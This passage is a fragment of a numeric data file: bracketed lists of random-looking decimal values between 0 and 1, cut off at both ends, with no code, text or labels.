0.4540352696485782, 0.21195369779733486, 0.6928865838321636, 0.8781932581019375, 0.0878483319411113, 0.6057078898390805, 0.15987352668355193, 0.4043379634587394, 0.13378959925065403, 0.1554722215122255, 0.7438940014972566, 0.8336690352294047, 0.6877734243478287, 0.9981056865172598, 0.37272155247430694, 0.37794604849085134, 0.9102485932649641, 0.7948893902036331, 0.7062565633546044, 0.35002910400391785, 0.800268577049325, 0.6722942185990822, 0.6930811231019787, 0.5726537666219839, 0.8030662994610022, 0.5338031175804704, 0.47510401586952977, 0.0998400549320192, 0.13813271817429318, 0.3499122796110664, 0.9080935911461205, 0.45951997032338987, 0.8352899530549001, 0.9161395355599374, 0.39359783724750497, 0.2612456013064707], [0.6549332078297421, 0.11578840859849782, 0.6144233694815883, 0.853900835685418, 0.1772070074990425, 0.4436508005645151, 0.4659796469903006, 0.03503779074687596, 0.9165319216565287, 0.5135370730464691, 0.6764984811339175, 0.18040547648363014, 0.2824135754503184, 0.6065007596792297, 0.8818748606694501, 0.9608461136638341, 0.7478342244538672, 0.5263224500503494, 0.37728242093697817, 0.09484031951679683, 0.7976311156011823, 0.24809103661726006, 0.30795204361475137, 0.5280421232364688, 0.30597987850015773, 0.3009004832619777, 0.4554960440183139, 0.07042701441135224, 0.6082196813912009, 0.8970281835272063, 0.27935913031921933, 0.5363561952778932, 0.8143598458464354, 0.089973700502332, 0.43145925634301274, 0.7779239125632348, 0.8874698901841058, 0.8218393411555373, 0.3299902058395041, 0.3665763017326201, 0.504076530115492, 0.6024665816303256, 0.6943095650669523, 0.9042127472560082, 0.6781092808931114, 0.7189425458741606, 0.4436296813589261, 0.6954238947292116, 0.9295454750505411, 0.5500195917385867, 0.7611291949638219, 0.4459883107405097, 0.9032762371321768, 0.9964840309078788, 0.6379748081692435, 0.9933374579097973, 0.9482688166669618, 0.7173672274160209, 0.8604968349225849, 0.8517363270038851, 0.08901117438365425, 0.3221061724953582, 0.9472852165876785, 0.35709440621740063, 0.22750737714795177, 0.03856667915238654, 0.3114918076235206, 0.8169779643438189, 0.47492251609082703, 0.49682984455876666, 0.15241573061950098, 0.6343903536716372, 0.11244139745442161, 0.44712955429389745, 0.873293293163993, 0.5248471820945273, 0.5612706553910557, 0.5910889073266472, 0.09636306716566723, 0.04650512928158601, 0.41290398095203784, 0.589407576287586, 0.22917692043896443, 0.5262836877885642, 0.5666944817246194, 0.39661751781132437, 0.8665615289862285, 0.9013868297334956, 0.1883508235290393], [0.7400104221993781, 0.630226036085156, 0.7514656105832032, 0.9865243410286294, 0.9342760013156045, 0.18177435800818809, 0.4195551443378924, 0.7553172328536675, 0.10554781970624305, 0.3521364850630867, 0.47226736417948045, 0.7775503340432989, 0.12296730584761417, 0.6601442424514967, 0.7778847558290984, 0.4585801700662131, 0.5531461262074561, 0.16951267366644074, 0.6225864124797916, 0.5144435464648989, 0.439122673216671, 0.1548261734121653, 0.15905808633499718, 0.7187280409616313, 0.7672393543400453, 0.5730798082845486, 0.30982870420494, 0.22638960606778025, 0.5589239562192408, 0.8357130227246332, 0.7207527854404117, 0.5161564375142326, 0.6951430518845073, 0.8966845403603594, 0.7132248896162114, 0.3085983322319481, 0.9077479373038442, 0.14703442242399523, 0.3886109483365531, 0.781904505649272, 0.6569009985698672, 0.5625163445592909, 0.09799982864254342, 0.5027000359241472, 0.7248639268748484, 0.9658625964452395, 0.5447840949418569, 0.4338794748436795, 0.17633623581743463, 0.07538033466959326, 0.8519967394192751, 0.7607216287573955, 0.9709519912242048, 0.8841756433079573, 0.13312201934769163, 0.22202898207524902, 0.9336611451737946, 0.5673783164988164, 0.5153027215928156, 0.13399055515153857, 0.1319808061482567, 0.6631717387530299, 0.43390258616011756, 0.33692459307657807, 0.7139774647530446, 0.38450981335455336, 0.655222586663236, 0.2937450474614418, 0.9845797522375724, 0.6564134354752074, 0.853228651598781, 0.3248486574821762, 0.7737508712141865, 0.7917891657687525, 0.693731159228003, 0.9994647986604203, 0.40499352152184676, 0.3197053008961218, 0.8215272133442786, 0.35357223681594263, 0.455574877198215, 0.7081401568628769, 0.9508455706946498, 0.8656391686204462, 0.1699772268264903, 0.2644158066883261, 0.4237792652518484, 0.4634932523788545, 0.058381268414249066], [0.6282527515347706, 0.7082375319356012, 0.8294834585514687, 0.7850529880097666, 0.6157637758097978, 0.08952945985222227, 0.14843645240944714, 0.5123444677911833, 0.3941302214553266, 0.6034888205738849, 0.6866146311222118, 0.17754266984415612, 0.9439369940188265, 0.8397102774338101, 0.06598743384380201, 0.7356135145139736, 0.7984550895290117, 0.07500782159956842, 0.882529485687207, 0.6156505464235636, 0.26394295318210315, 0.23472315277675104, 0.8424789759191136, 0.500490692323112, 0.45358817896965653, 0.7366979730968164, 0.22458762123770093, 0.7100399830186281, 0.3180718927431502, 0.6180618071368218, 0.37921045598210545, 0.8127224585057631, 0.6116812338670113, 0.405769948640344, 0.9513417488224132, 0.5522957251080056, 0.2935429390837918, 0.35761721039477035, 0.5065314583867527, 0.6094675263380969, 0.03849683057100828, 0.3432058092227541, 0.08000671698890327, 0.9331835053010694, 0.5637975952835825, 0.6480704938071198, 0.8459866307259181, 0.2135636947971823, 0.09211894050482883, 0.4612572887479546, 0.9462735340504043, 0.637120678926244, 0.05235236356847306, 0.42190507941618893, 0.5090960789929788, 0.9212569764746177, 0.6034188684085509, 0.4799339330251686, 0.09273265401689201, 0.23181968957552834, 0.23868435379203812, 0.9968746761819873, 0.28755548229608285, 0.3714057891358449, 0.07425062115339931, 0.3651478130176493, 0.6036967846484682, 0.7991726080736247, 0.971291820772433, 0.16160256647677618, 0.7903624967685605, 0.1412354754440447, 0.12660709249074475, 0.010077238979253389, 0.23722006648473482, 0.4163461080519334, 0.1639194461620429, 0.26266296260438593, 0.45330327693987726, 0.9214691369319028, 0.7772667376255449, 0.1890648116447483, 0.3287170245229647, 0.6866390662654077, 0.20753106255170317, 0.011574693585364115, 0.9789652007042667, 0.653005721239906, 0.4975431114419263], [0.49657648675657773, 0.4744558132153889, 0.5455397555082582, 0.12920566509980902, 0.99434011616237, 0.6218836447374883, 0.725487357090924, 0.7967121970586566, 0.7537924864449075, 0.764723357235154, 0.24028795476745823, 0.014911109533143674, 0.9108524197681788, 0.294423303215784, 0.8977013554799926, 0.31551913981311586, 0.3598957769974983, 0.3751336886770198, 0.740404005799475, 0.5353805868246057, 0.5503084038983947, 0.8618458611595128, 0.23331207463810055, 0.4941146930966145, 0.6890338851088279, 0.3891494321009462, 0.7918898138187324, 0.11723791313564214, 0.43403988225200874, 0.41823078128769753, 0.49505727927361487, 0.5085346558616808, 0.6414078007591949, 0.4366806696636688, 0.3278269369319383, 0.6939884806151422, 0.7063666120990798, 0.37580624107468663, 0.044488369193373956, 0.7476613189248547, 0.0009115943936399695, 0.8552137293452866, 0.550116218897352, 0.6605343140369605, 0.29516892427677044, 0.4644970808470412, 0.4838384958546975, 0.7610015038305113, 0.17014707096096848, 0.872840410226839, 0.8839353215624173, 0.4723460862342893, 0.4894929953194648, 0.23888839064139777, 0.625140068432814, 0.9355477477963459, 0.3920841407439285, 0.5451429987765117, 0.36482553999961864, 0.9102257522522803, 0.36007943539261855, 0.4852099251126085, 0.15117034149260333, 0.5412567134212384, 0.13666989591681444, 0.6770969068068703, 0.9788163005673264, 0.8606412028453266, 0.033911283328816544, 0.8340323867755288, 0.02303011418368439, 0.5585995781868467, 0.7352789685946791, 0.1438299567281247, 0.05154466373980282, 0.4037524293937569, 0.9057114101479112, 0.003824910713708052, 0.8625558517919276, 0.6338975088265412, 0.2929056403143112, 0.1024212928983883, 0.5986460066947908, 0.22972405711813892, 0.7323366226996115, 0.07292650066047812, 0.9293647630545293, 0.5668289135380598, 0.7359472779104181], [0.9644480153418049, 0.41928687240850604, 0.9611573939613701, 0.71592971409076, 0.2205136357615638, 0.9112093764398144, 0.5499476258871991, 0.5168858534130215, 0.17133520916153577, 0.7602970352783872, 0.5074254956425938, 0.6777170751805602, 0.08077029055701845, 0.43878777412982595, 0.25287748245188313, 0.9614446458266445, 0.3639253211423681, 0.05256271815519753, 0.6148691415103924, 0.2487419375990334, 0.35824154600250435, 0.9067019944167994, 0.05877616874843972, 0.006354431890934764, 0.2179743490315822, 0.6954430389905436, 0.18892235116789324, 0.5232146398335236, 0.406662346922371, 0.1009900605373163, 0.2265708112589233, 0.34193863483074516, 0.6526686904982149, 0.3244964680949547, 0.8402864048040822, 0.4559846292452603, 0.30094449334399975, 0.5318377308194979, 0.7866497659173006, 0.18531010950606208, 0.2719305706421865, 0.37145072644545507, 0.5178885544863067, 0.5936046787898941, 0.2778425374846488, 0.6049458200493162, 0.5807706026711047, 0.071741389307587, 0.6240031940588721, 0.11370884998668773, 0.914513451103305, 0.17597493197990288, 0.46751975431587023, 0.47708462235011195, 0.46876628382492913, 0.46522519929436, 0.9202684873512351, 0.2080608071133505, 0.7892932803299003, 0.53884951140289, 0.9230920636585168, 0.8464885189583646, 0.11117188350699769, 0.03498702994169567, 0.6005399781033668, 0.2453880313427016, 0.4893759313725845, 0.42672916143574136, 0.19552448342138695, 0.9174798952797049, 0.8330849088114688, 0.7694111284586417, 0.6447263273982703, 0.4363511190901662, 0.03946076823619438, 0.8496284747699259, 0.27230046820131415, 0.00967916199902319, 0.4342519037765802, 0.835674087717838, 0.5026763575809863, 0.25242567021541895, 0.3619342956157996, 0.8783972945692003, 0.5900295714418082, 0.7409126565166102, 0.33056208243859875, 0.4310928989900411, 0.23197064066997475], [0.9672612628717029, 0.7549476674856538, 0.41998928394820867, 0.2992612845690634, 0.16005558213494164, 0.9252226144636976, 0.7428270098614156, 0.8535568604097897, 0.9226589541578119, 0.029816019200611943, 0.5811668267981728, 0.9065699930064296, 0.9910422651004673, 0.91917684042913, 0.11578938326098587, 0.13175010006965515, 0.534894254067312, 0.46226497891060514, 0.4271223213052008, 0.8613275568481644, 0.5453088076839855, 0.20459316095876057, 0.48691514730705643, 0.3596541231666336, 0.18527394047550028, 0.3463281658175761, 0.5083949318445959, 0.941909589094781, 0.19606991510467608, 0.8727800351408603, 0.8652384025039243, 0.4389442618170576, 0.47241635941462035, 0.954921580536099, 0.29189903067486955, 0.7396587003843998, 0.09103272300486154, 0.2897443278094951, 0.5726831083232797, 0.32929144334524185, 0.5542090416151821, 0.7849705561556838, 0.0837631119818818, 0.7996068490036525, 0.11222431942751476, 0.6242073712524293, 0.6932589715718123, 0.003960007483818084, 0.304375738984907, 0.08320186842811195, 0.3969801924808619, 0.14925809036038384, 0.7343706551922401, 0.10005293187868214, 0.7700729140479224, 0.5669713213289158, 0.25555257946780485, 0.4724918808836006, 0.9191791608865799, 0.6151671319329918, 0.5768078376189982, 0.8835304480050363, 0.5085735032877438, 0.33626832495436876, 0.2478878883584581, 0.6821382294708774, 0.4319164786204157, 0.35750716287858453, 0.4675262776706487, 0.42564057602421357, 0.4908926618488364, 0.5105480995969054, 0.0016314128062669964, 0.9244071151799375, 0.8658256508548055, 0.9611054614673685, 0.4570967701721632, 0.39195954329084537, 0.8180497154423787, 0.8244291776563745, 0.9516553794020454, 0.32990994140605046, 0.4352794558690214, 0.4445199146968666, 0.7047427268905514, 0.29310922348990043, 0.012750945224687671, 0.26775609841815706, 0.7626379565899358], [0.45365113132648316, 0.8720900274930891, 0.9191439829865603, 0.5527492990288301, 0.5305975777998503, 0.6729969275159186, 0.487199454261557, 0.38587023261096676, 0.5714348466632854, 0.7955345520008231, 0.48338085746337267, 0.05235837681864908, 0.8093303671977242, 0.9140523249794883, 0.8973954475348158, 0.5248843086859181, 0.3315034185736029, 0.4445951042959321, 0.29240461148609087, 0.28768321287087384, 0.3872596709871783, 0.9153807380564669, 0.7771227135646818, 0.2516788296885394, 0.7479641943973943, 0.05505269561012183, 0.7921797686643154, 0.934529508336063, 0.687728633182449, 0.24126893625093204, 0.25266311426494203, 0.006720114358572671, 0.7251986998207857, 0.5858992033128897, 0.9778943351140168, 0.9846587091675765, 0.13407578847384094, 0.1285996254048376, 0.05611919683878097, 0.41463975248983065, 0.46659674064475054, 0.9243730699797271, 0.8400042994341437, 0.4291863853995169, 0.43142875482745247, 0.08875773193681735, 0.07824047692259117, 0.1768278762851997, 0.9627660028806695, 0.9292442531063778, 0.48040165322052675, 0.5278703729824156, 0.9250763710098033, 0.4049966143675232, 0.21922434769962107, 0.048505320396024953, 0.5513762364807503, 0.9740814089281237, 0.9727280476745481, 0.35459073396198837, 0.6263184861280302, 0.2725684750947157, 0.6144433863290694, 0.7108486516467465, 0.9826192271079089, 0.04109997197975135, 0.06780418161366708, 0.05127670987726152, 0.2306751306684247, 0.8027429574562651, 0.5742873316090442, 0.7318382719436122, 0.5657922897888132, 0.389503421891643, 0.352823352945159, 0.4974212447613273, 0.7802617578093302, 0.7574648922846634, 0.36891043948202484, 0.9133573149707425, 0.6844671246969511, 0.7443562531602057, 0.39908316175459624, 0.8810652055388024, 0.2678786628069584, 0.8774314212848991, 0.9182825244785126, 0.94109104215407, 0.7661109730312469], [0.28102658290312343, 0.6675399713694437, 0.02637599027239501, 0.12122777345674152, 0.8647088008243533, 0.8873354836760975, 0.5463614874646883, 0.8063612010495345, 0.40803733457934266, 0.18925168219736976, 0.36968449995628916, 0.8060550400314102, 0.5577213759690646, 0.7376060968498541, 0.43127142815715935, 0.4509822083585815, 0.0720101202526856, 0.04299353756403823, 0.05856704469118501, 0.627258105071687, 0.8695784003038088, 0.6781222425365039, 0.45830732591930035, 0.871812520890627, 0.7032374847253904, 0.08659869452728464, 0.764683049571795, 0.7151376653665062, 0.45849371236048253, 0.662147937654955, 0.6038338101738641, 0.8214594183345119, 0.409211488545116, 0.9253545095386697, 0.6750481827881651, 0.4645182283421878, 0.07665821031430575, 0.4840197666603945, 0.9979008931608472, 0.4208429270348981, 0.6776073167710462, 0.4865032103314654, 0.6395741896180238, 0.0075945675958375425, 0.7664209142838236, 0.9164369820877328, 0.7262582968437862, 0.4280785997480394, 0.5227435842795608, 0.5005340085798784, 0.4966149893392101, 0.3484818504019934, 0.5320621948546478, 0.9874065282367146, 0.9426615786656032, 0.6222600855138842, 0.5952000567569442, 0.8546447101958297, 0.6131670649485476, 0.6315475428913977, 0.2741744618614177, 0.8652196372983686, 0.2763902081803249, 0.19493607154181114, 0.9730467911958566, 0.04485346737752682, 0.9509428112393947, 0.30356031129835914, 0.9448525690619709, 0.7605213660376637, 0.4794916706079485, 0.004814199432669142, 0.6980322498507293, 0.49519813068477736, 0.8093899743254392, 0.9460344415148102, 0.42111693542424544, 0.5314813637776272, 0.2682724320276878, 0.7831994424119105, 0.06456394727544179, 0.16603630431167138, 0.7812824505883578, 0.4366365550556517, 0.7139898058064847, 0.11585995165193474, 0.1359872693202745, 0.22836611065278578, 0.7634390326075572], [0.2815928118657893, 0.6421557748083074, 0.07221245440324864, 0.24733677886356065, 0.7327505934540889, 0.2345108796148314, 0.19559760049175556, 0.9808964163981309, 0.22986966474029302, 0.0664847381017355, 0.020886548096090696, 0.3145967751409794, 0.7516287583536679, 0.2853119385114712, 0.5935894655967154, 0.6810953256701896, 0.14549445957525786, 0.7038430126676465, 0.24683636854163737, 0.21880343956942094, 0.7264892039336861, 0.8316728940836365, 0.9244548036760278, 0.8914554284532915, 0.6458527188375659, 0.6444364704687829, 0.7951538401051371, 0.3351025676937275, 0.6282517806312325, 0.7601222604306523, 0.7464242524025058, 0.7445279656996091, 0.11265276520565937, 0.09174653593544757, 0.8812372587956907, 0.6078649997312181, 0.10880433524049216, 0.6639602797517805, 0.3843478303027952, 0.251820769730991, 0.6390956588921013, 0.12160081809438661, 0.6936354096609435, 0.3154363031871422, 0.3178829408651026, 0.23378795983324396, 0.6755078991682946, 0.49277356892086566, 0.24249003961514326, 0.8815013063563807, 0.4516215459081706, 0.7152291776345004, 0.3960109082579346, 0.30284979111947374, 0.9904092131578917, 0.7620211276914811, 0.15975154656342538, 0.17539630151707064, 0.18016513699807424, 0.6907558763648234, 0.892672555294461, 0.007394242746436075, 0.7573683541601861, 0.5745636486419877, 0.8236206453557267, 0.7686773500566357, 0.6613022311895436, 0.7517589116317323, 0.579469229227495, 0.5182864640992512, 0.3889010996414244, 0.8620749501622571, 0.6601171211740994, 0.9695652710733513, 0.4555092278262415, 0.7461833301338536, 0.21718096742908088, 0.7098202144411001, 0.6856984960845128, 0.5935010194147405, 0.002163051905758162, 0.43390952418446616, 0.10938324324058779, 0.08220318650969383, 0.18130086213499497, 0.039544212313441074, 0.9990759239737603, 0.6384695388631759, 0.3452301752983872], [0.24109150301289917, 0.32372111287753114, 0.07653511570702243, 0.21270701450026963, 0.12564927736361087, 0.11647944255110831, 0.4460649994306498, 0.36127310830659154, 0.2658767337783533, 0.041397322852893215, 0.8670159228544067, 0.3541875545281402, 0.34116762701263215, 0.3157374722638705, 0.9826396931623617, 0.4457203919983369, 0.24365559567713502, 0.25944923274762643, 0.4865397919569593, 0.2363074075142274, 0.6901162390818847, 0.08130003771560312, 0.1587083270453804, 0.7264484198370815, 0.8017841417309415, 0.8575384770736134, 0.10293642622989296, 0.9116312980202892, 0.5331276179018002, 0.30830770615187475, 0.7858717022485313, 0.5540433984700993, 0.53316972681342, 0.6957321421946101, 0.18161833367249858, 0.38819109285283016, 0.637982481240981, 0.12997178736374038, 0.637353005783506, 0.8233578720744779, 0.26784236991245614, 0.7679216146192962, 0.6363968869690759, 0.2795872234992065, 0.11044926841083103, 0.471847865552502, 0.3058934982132948, 0.6730874195362063, 0.4488121237636721, 0.7483218141361091, 0.09005646432172354, 0.7032063495455363, 0.930802028017315, 0.12015899419122733, 0.7841717385803408, 0.6624796023665821, 0.19962078514356973, 0.7723170326403372, 0.9999443303418527, 0.3088008449712276, 0.4624527221119398, 0.10090599920277643, 0.09252744227359788, 0.6363900031959746, 0.6585307915460383, 0.03059632763336484, 0.9812004260358894, 0.5896782617047055, 0.9554339982620612, 0.9523916606987308, 0.006630957727835507, 0.12833915895432846, 0.33083836309665127, 0.6534558922987322, 0.9074780436345463, 0.09308196930584911, 0.3322220752399876, 0.8658097513882973, 0.1481542524631284, 0.6053461850798914, 0.35142080818569943, 0.16790741730750736, 0.39285818447738585, 0.17185431490152037, 0.262280189728758, 0.6059373467108818, 0.6278196365157285, 0.41365585044659015, 0.4422852416465084], [0.6591967648658948, 0.16522060042030706, 0.2178158003875026, 0.06996671656220843, 0.21453562722515263, 0.838495270965371, 0.12598607388500993, 0.8635321815717873, 0.4260900973737818, 0.492543311171594, 0.8646059813468949, 0.9919932937337068, 0.08099618321381885, 0.39128725498868133, 0.6403848241662378, 0.7655460073686464, 0.7567949082019568, 0.5486145249214119, 0.9800237606407411, 0.545397539146102, 0.7977974871803412, 0.3115602752918806, 0.26934562584491695, 0.8104545816093495, 0.6101271136857153, 0.4771495202515812, 0.26967546193071923, 0.9192018544797964, 0.8109280120677221, 0.2341654943180238, 0.17186972158645786, 0.7918742711194054, 0.03630560869364863, 0.9036952109975874, 0.3550340449942525, 0.35494773353938536, 0.3447916994570376, 0.19352110350464957, 0.8085012245233326, 0.5975345574050984, 0.43987317714589746, 0.46035486581610485, 0.36686172377342874, 0.05467043923854653, 0.8412616242992218, 0.5148148124982972, 0.1202542025302008, 0.6550828966271229, 0.6273623583883673, 0.5063672232038842, 0.4755120892426853, 0.030012281292476017, 0.4277239686677363, 0.9578371994556695, 0.3793734245593571, 0.30198126880463516, 0.7879622483757246, 0.29432155286243245, 0.06289276671610144, 0.08246536511965041, 0.7661039993359088, 0.8231086027955618, 0.5959719152179885, 0.012070351589330008, 0.17952996325339998, 0.1521821123014404, 0.6436262134291998, 0.6894708200538069, 0.6498121459788276, 0.2540481306076876, 0.7277799164899151, 0.123625984535781, 0.2584023948099561, 0.0828649716072809, 0.9044057295652801, 0.08185364699170872, 0.6161516468496842, 0.4147080958268625, 0.6210323335099277, 0.5853362506427632, 0.7965081197177837, 0.5516108898805426, 0.5093675322310807, 0.9199398473798442, 0.28920962843373577, 0.8271355625964802, 0.7017004309136745, 0.6238200931887335, 0.7342615781305649], [0.655890152753949, 0.6267107102256754, 0.7274325191322725, 0.43275881333033084, 0.0289198999492003, 0.5908388007273873, 0.2582876968152924, 0.8721503355412265, 0.8419966768350313, 0.7474726014932418, 0.9772009886312799, 0.7646477918635538, 0.8755093557668028, 0.19611509243372394, 0.044344640590507245, 0.12001723716778723, 0.1546563715766679, 0.37984995550452816, 0.5637894814769718, 0.28869801149408303, 0.17778253224856144, 0.4385746947785921, 0.471979238973402, 0.5830493298155313, 0.40282718918102334, 0.24351028427649413, 0.8056474541838339, 0.12958547021420364, 0.06023030253306927, 0.9091124735167827, 0.08156454598172125, 0.9569831963676516, 0.0073453762756653385, 0.9748167205429961, 0.802769100368193, 0.1754041091385372, 0.8234709422927287, 0.5285533577785089, 0.3611080955688172, 0.7538217724990421, 0.5442135297383975, 0.17537782774744992, 0.7651937004042411, 0.9745303073489504, 0.737149536929269, 0.2943283257372862, 0.2923670683223072, 0.6977133655951058, 0.6096979456804081, 0.7986920572291966, 0.3408386110302507, 0.9035519033670925, 0.9081294923233973, 0.7971970337943273, 0.05983997009749298, 0.9771679664301355, 0.565968246018934, 0.4163253501048081, 0.36361595874186736, 0.5117960430093358, 0.8390405848072401, 0.16547512802259445, 0.6654891592863216, 0.5117157374105428, 0.8322140983167018, 0.3843264331100835, 0.43167618804782504, 0.2327197949222124, 0.4067627452235255, 0.638972900221592, 0.3291357916130446, 0.8427797791000053, 0.12321788408765477, 0.1982770592734726, 0.7389766984858515, 0.036617953634339506, 0.5918177615694417, 0.46802146837154435, 0.7495584766650523, 0.9993878672173147, 0.07052533525512228, 0.2605593408354726, 0.25910497689514644, 0.12155753193018703, 0.47354932081738, 0.30101725742553453, 0.44988069834569233, 0.5161931067525062, 0.2885050521282193], [0.11970511836677078, 0.9720160895064518, 0.3246424164426952, 0.21723611289703493, 0.035414622092900694, 0.24529852592649348, 0.2722891880741799, 0.499850005042214, 0.20145630588727903, 0.1459711808729005, 0.04520546545884785, 0.20112555117242703, 0.2894076550429734, 0.21819111959319137, 0.9464205680685482, 0.28732237882197464, 0.11537738097898032, 0.8551051875606274, 0.5573753381653325, 0.8445948645110066, 0.7746852325015731, 0.1941830174365895, 0.2561239332778553, 0.7959321195800542, 0.7760778276951928, 0.7342238753660116, 0.2625071923740946, 0.697155931288141, 0.32375504150563306, 0.046985451151499213, 0.34801355304416504, 0.5506583267144037, 0.4006651192077908, 0.012832158021847007, 0.6758809380265863, 0.10141289097082595, 0.9702066621713097, 0.5646235729766642, 0.8325476436167865, 0.7682217919929928, 0.8617587057908741, 0.3300966614202542, 0.9434330995041073, 0.8877418065180903, 0.26770712355354565, 0.2136213309910744, 0.15045820361866435, 0.6879740843141939, 0.6641821423560198, 0.5482728443517759, 0.8057808209684176, 0.9902761453835169, 0.6135337226474069, 0.7914625880266036, 0.7639417238225087, 0.709135055899259, 0.85917827520488, 0.258565709495413, 0.20646040778471508, 0.24254874703171114, 0.2977462722295042, 0.9295417260487522, 0.744108322558439, 0.26761175983488594, 0.28948457466946753, 0.6650486136215279, 0.1351910159715053, 0.21846680821498254, 0.07585811778241747, 0.10135409018067265, 0.7102807294484744, 0.2346726914098325, 0.29934734355706627, 0.33102450198604016, 0.4325504289976432, 0.3343815423248766, 0.7837478487828495, 0.19713899722415495, 0.9014522118687555, 0.9626776655180953, 0.3949208960854468, 0.10071291855316511, 0.6038707916529708, 0.006558650580003267, 0.6092943107419194, 0.2448125561419061, 0.3088739542131669, 0.2015996333073513, 0.754993451369462], [0.7334598360323372, 0.6213122986627283, 0.5099671511689753, 0.6023208844699216, 0.3934514679469979, 0.03186254196026972, 0.6812223761823147, 0.39891940502528145, 0.41733988946478995, 0.9640833018077202, 0.7406911113895547, 0.06831774169310656, 0.45604131944659887, 0.036690593913055736, 0.21461459668661143, 0.7094638408309013, 0.7814218859158589, 0.8756943111040795, 0.6793527094967223, 0.8165173463940313, 0.08952842495581914, 0.6779247028948047, 0.5000674715946007, 0.8404049681384651, 0.4575360326272424, 0.47549580239814926, 0.24245867553301148, 0.40141269933879564, 0.6471005164841283, 0.40026117823219387, 0.34201226502492243, 0.7677585029522445, 0.11905220179048193, 0.9741776072008831, 0.700337305589707, 0.2666614488633432, 0.03162646176331818, 0.17575227808441618, 0.44098427525365436, 0.21441244851156127, 0.7609837368077743, 0.10300856132070235, 0.15701221201495486, 0.2910445989050485, 0.02783779883288806, 0.88026699443597, 0.9764671038678243, 0.5804819125788806, 0.9584033036232809, 0.9734188346008469, 0.1471535275181406, 0.8949475656531718, 0.62446550958074, 0.1988089665207855, 0.2631457494290119, 0.2774720716106718, 0.5731470148122897, 0.09939334216889228, 0.11138347662407777, 0.3064944898270764, 0.8915315848921164, 0.1381387214950709, 0.49988996561234744, 0.10940178420946367, 0.18163288215500828, 0.19325292454922904, 0.756903393028079, 0.4332893823830972, 0.9397461668361746, 0.8503475069023211, 0.739191607174379, 0.7180213002210724, 0.2379112349840583, 0.7813055264745564, 0.35549338655335416, 0.05595516921544463, 0.06217189641866738, 0.07138064098610386, 0.394755073295731, 0.26933062242333106, 0.6452003933835241, 0.19088831087404035, 0.6503872346965611, 0.4862269879513481, 0.32792368010450046, 0.31190685128688045, 0.6541980173035392, 0.5355403082796331, 0.5349184655875114], [0.061944478495653876, 0.9218834766067425, 0.6157343772817337, 0.5541317889722753, 0.9765694851380337, 0.5520190487709714, 0.8298675518464287, 0.9584840011447893, 0.08047776093659054, 0.36061525710785347, 0.9543098765389603, 0.15996162026151217, 0.7769547370475819, 0.20419840017839197, 0.16087724190199526, 0.020488753135045723, 0.39166470865812775, 0.14098284402977945, 0.22344341303068982, 0.7245818369480193, 0.6441195961122892, 0.6169027321899068, 0.4775437661710459, 0.7631356261171676, 0.16983067815784014, 0.3390969559098077, 0.3118417205206393, 0.9088006250676585, 0.9254115677841083, 0.9997357550508311, 0.5750254694640379, 0.9034274838791181, 0.6187386707272009, 0.17345607055116652, 0.7240166901746571, 0.0777805166204909, 0.9274908527364186, 0.25489999351987713, 0.7778944507840992, 0.4310415464995596, 0.7354681927280917, 0.7409902017128045, 0.3008133004637512, 0.8467907057945299, 0.7484799555098106, 0.5743758431503037, 0.12617549445577192, 0.8805329986724553, 0.7183467702438721, 0.2602203439864479, 0.03339719317635903, 0.045670039265412465, 0.12103879958840502, 0.06927791071142764, 0.37670081184683735, 0.8275016447969787, 0.1514186652787204, 0.6379975487728535, 0.8512706927726841, 0.2857544748448638, 0.6827500522522484, 0.6217459998624608, 0.6144047364655879, 0.9857143708547291, 0.25616697614146344, 0.002826728380292076, 0.6521691358080715, 0.45737280008186154, 0.744103260970887, 0.07236597608499984, 0.6882622141323181, 0.4213642044839885, 0.9245833703329958, 0.34474054371055307, 0.7007339415012795, 0.1083620067707518, 0.08405229496565014, 0.5204825195835768, 0.934983638665155, 0.6290521165378271, 0.2137522573882754, 0.40787203161995034, 0.08622807731788629, 0.1505024932090454, 0.744806809775807, 0.3577970211134588, 0.1855778026408681, 0.695100751524657, 0.39928213580978966], [0.09691542895648897, 0.6501530397773886, 0.2550564775564159, 0.6731167637768715, 0.29056533688516073, 0.09427391446756861, 0.9803480534930317, 0.7542864164293538, 0.578840583101294, 0.5232257378740325, 0.19904564962833649, 0.7845202567500448, 0.5106590042252319, 0.31980058773254216, 0.6986206956279947, 0.9110550619725549, 0.9588629749344665, 0.9884041226104342, 0.11637460639790387, 0.09044305155154442, 0.9719405047382967, 0.3551285644965715, 0.6705158884389929, 0.065147588726859, 0.787155833227741, 0.28464899333437177, 0.29679759082602586, 0.8257757845023331, 0.7312110728179452, 0.5557192552917193, 0.9154953065704262, 0.5397762921531886, 0.12722186274705582, 0.08994271884045768, 0.4027288358961818, 0.8387773638393714, 0.6631558551088157, 0.26794760768069703, 0.8748486620169538, 0.3560893550472849, 0.5838415956195117, 0.15623406651234406, 0.18203535941376825, 0.17776278585603433, 0.24890702818711397, 0.9045867569222873, 0.7642154984899315, 0.9316109009156385, 0.25088166800255196, 0.6675442846220626, 0.9342508775666486, 0.11841423668508866, 0.908596223821084, 0.8239407983929453, 0.7345664292924594, 0.32446151307148197, 0.9100280529452304, 0.73218207939801, 0.31623859177450275, 0.09328177695028828, 0.06336233007647374, 0.34225417648222745, 0.21386016769890814, 0.6940246118667874, 0.47020083996685214, 0.9970096593221234, 0.33291887999479897, 0.8962783307864562, 0.11307750011093243, 0.38941736523552717, 0.764159166630869, 0.7527368616289494, 0.372538265485467, 0.7600070333667909, 0.04446527645507181, 0.7735040013166462, 0.14537530543648858, 0.12623534686976767, 0.8698919385176571, 0.20202455882277526, 0.3263852539150288, 0.8843660366778526, 0.1362771396538739, 0.267043244974153, 0.6441485000395049, 0.4838210828998889, 0.14594659829184786, 0.2064059862331301, 0.1865071853468997], [0.18020062662908343, 0.30551132099640554, 0.4928034106938415, 0.003515581554132341, 0.7905998185194624, 0.5611383020413825, 0.7056342363255641, 0.139436595683761, 0.4522379180673618, 0.5873027510646525, 0.6318489483703654, 0.9038440928331604, 0.38471290444226147, 0.22847603525824434, 0.9654413715737777, 0.894162097488138, 0.2939685002102237, 0.5129443797137926, 0.3438028381774195, 0.3258286605224975, 0.585026371075334, 0.6639978553113118, 0.6837762825599943, 0.19848209052207555, 0.835877273975075, 0.8329484834096774, 0.1861582772130862, 0.19129106919713101, 0.9227433019974682, 0.11905187802988981, 0.6914568601676114, 0.6266061919099049, 0.33838964785012693, 0.3275256071834589, 0.6559532445773761, 0.9219000057005576, 0.8111226772577241, 0.5656091935589119, 0.06702182271669987, 0.8106317345691909, 0.10264702127580194, 0.4015589559135615, 0.09594600954611021, 0.2349097538449344, 0.34539559811960374, 0.18263754425993395, 0.13529061938172016, 0.8637487993289741, 0.7677974377883298, 